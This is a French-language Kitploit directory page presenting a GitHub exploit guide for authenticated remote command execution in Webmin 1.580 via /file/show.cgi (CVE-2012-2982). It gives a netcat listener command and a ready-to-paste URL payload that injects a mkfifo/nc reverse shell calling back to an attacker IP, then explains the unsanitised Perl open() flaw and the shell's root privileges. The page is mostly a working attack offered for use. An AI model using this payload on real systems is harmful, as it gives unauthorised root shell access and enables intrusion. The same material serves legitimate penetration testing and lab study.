Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit- — Exploit manuel d'exécution de code à distance (RCE) authentifiée, sans Metasploit, via la barre d'URL du navigateur pour Webmin 1.580 (CVE-2012-2982) | Kitploit
Outils/GitHubGitHub/marinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubmarinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-

Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit-

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

Exploit manuel d'exécution de code à distance (RCE) authentifiée, sans Metasploit, via la barre d'URL du navigateur pour Webmin 1.580 (CVE-2012-2982)

Voir le dépôt
il y a 2 moisPas encore vérifié
Partager

Guide d'exécution RCE sur Webmin 1.580

Référence rapide pour réaliser une exécution de code à distance (RCE) authentifiée sur Webmin 1.580 via le composant /file/show.cgi.


1. Machine d'attaque (écouteur)

Exécutez cette commande sur votre machine locale pour intercepter la connexion entrante avant d'exécuter le payload :

root@kitploit:~
rlwrap nc -lnvp 4444
  1. Payload d'exploitation de la cible Collez l'URL suivante directement dans la barre d'adresse de votre navigateur (assurez-vous d'abord d'être connecté au tableau de bord Webmin) :
root@kitploit:~
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Capture d'écran 2026-05-25 220641

Remarque : pensez à remplacer <YOUR_ATTACK_IP> par votre adresse IP locale ou de tunnel réelle, AINSI QUE l'IP et le PORT de la cible. Capture d'écran 2026-05-25 220708

Contexte et détails Vulnérabilité : assainissement insuffisant des informations de chemin intégrées transmises à la fonction open() interne de Perl dans /file/show.cgi. L'ajout du caractère pipe (|) permet l'exécution de commandes arbitraires avec les privilèges root.

Authentification : ceci nécessite une session active. Le navigateur gère automatiquement l'authentification en envoyant les cookies de votre session active lorsque vous soumettez le payload via l'URL.

Comportement attendu : après avoir appuyé sur Entrée, l'onglet du navigateur tournera et semblera se bloquer indéfiniment. Cela confirme que le thread du serveur a été détourné avec succès pour maintenir la session shell interactive.

Télécharger l’outil